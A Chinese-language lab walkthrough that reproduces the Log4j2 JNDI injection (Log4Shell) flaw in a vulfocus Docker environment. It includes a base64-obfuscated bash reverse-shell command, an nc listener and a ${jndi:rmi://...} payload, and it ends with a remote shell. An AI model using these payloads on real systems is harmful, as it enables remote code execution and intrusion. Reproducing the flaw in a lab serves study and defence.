0x01 漏洞描述
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大,建议客户尽快采取措施防护此漏洞。
0x02 漏洞版本
Apache Log4j 2.x < 2.15.0-rc2
0x03 环境搭建
1.使用 docker 拉取漏洞镜像
docker pull vulfocus/log4j2-rce-2021-12-09:latest
![](https://img-blog.csdnimg.cn/50448b90a5ff42a7b88817c11a8c1820.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
2.查看漏洞镜像并开启环境
docker images
docker run -d -P vulfocus/log4j2-rce-2021-12-09
![](https://img-blog.csdnimg.cn/7f3904b922f842538839293866fd5070.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
3.访问漏洞环境,,环境搭建完成
http://192.168.189.195:32770
![](https://img-blog.csdnimg.cn/cfee72f9ae0440259e6f8d2311faa19e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
0x04 漏洞复现
1.开启ldap和rmi服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xMzQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.189.195"
![](https://img-blog.csdnimg.cn/5735a7469d3c40a8bef50aaf577e583c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
2.开启nc监听
nc -lvp 9999
![](https://img-blog.csdnimg.cn/7c6d16ab1ab048939b4eaafa9709f2ae.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_13,color_FFFFFF,t_70,g_se,x_16)
3.使用火狐浏览器进行验证
payloadL:
payload=${jndi:
rmi://192.168.189.134:1099/zqueiv}
![](https://img-blog.csdnimg.cn/4fb011b31c9248e898df1a16d8772550.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/4d8fd926ab0647469088812a63fb9525.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
4.查看 nc反弹shell,反弹shell
![](https://img-blog.csdnimg.cn/096c50a7273440c5ada480ea18d09a2e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Y-45b6S6I2G,size_20,color_FFFFFF,t_70,g_se,x_16)
0x05 漏洞复现
poc 的是直接生成一个txt,然后访问,若是存在则漏洞存在,负责不存在.
exp 就直接getshell 吧.